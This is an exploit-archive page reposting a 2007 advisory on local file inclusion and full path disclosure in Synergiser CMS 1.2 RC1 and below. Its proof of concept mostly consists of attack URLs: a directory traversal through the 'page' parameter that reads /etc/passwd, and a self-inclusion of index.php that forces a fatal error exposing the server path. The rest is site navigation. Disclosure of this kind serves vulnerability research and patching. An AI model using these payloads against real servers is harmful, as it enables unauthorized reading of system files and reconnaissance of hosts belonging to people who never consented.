syner-lfi.txt

syner-lfi.txt: Posted Nov 1, 2007; Authored by KiNgOfThEwOrLd | Site inj3ct-it.org; Synergiser versions 1.2 RC1 and below suffer from local file inclusion and full path disclosure vulnerabilities.; tags | exploit, local, vulnerability, file inclusion; SHA-256 | 30b88d672f425dc1bfef99169430c0dfc2b2901c45aecc3449e3d1888ee4cfc4; Download | Favorite | View

syner-lfi.txt

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org 
Original here: http://www.inj3ct-it.org/exploit/syner.txt
---------------------------------------------------------------

Synergiser <= 1.2 RC1 Local File Inclusion & Full path disclosure

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC:
---------------------------------------------------------------
Synergiser cms allows to include a file by the get variabile "page". We can't include a remote file, coz there is a filter..but we can include, by a directory traversal, some important files...for example:
---------------------------------------------------------------
http://[target]/[synergiser_path]/index.php?page=../../../etc/passwd
---------------------------------------------------------------
So, we have to know the script path if we wanna browse the server...we can get it generating a full path disclosure, like this:
---------------------------------------------------------------
http://[target]/[synergiser_path]/index.php?page=../index.php
---------------------------------------------------------------
We know that a function cannot be declared two times. So, let's read the "index.php" code, and we will found:
---------------------------------------------------------------
include('application_top.php');
---------------------------------------------------------------
This row includes "application_top.php". In that page, is declared a php function: assign_rand_value(); So, including index.php in index.php, we will reinclude application_top.php, and we will redeclare the same function. We can't do it! So the server will answer:
---------------------------------------------------------------
Fatal error: Cannot redeclare assign_rand_value() (previously declared in [script_path]/application_top.php:9) in [script_path]/application_top.php on line 124
---------------------------------------------------------------
And we got the script path! :P
---------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

syner-lfi.txt

syner-lfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

syner-lfi.txt

Share This

syner-lfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems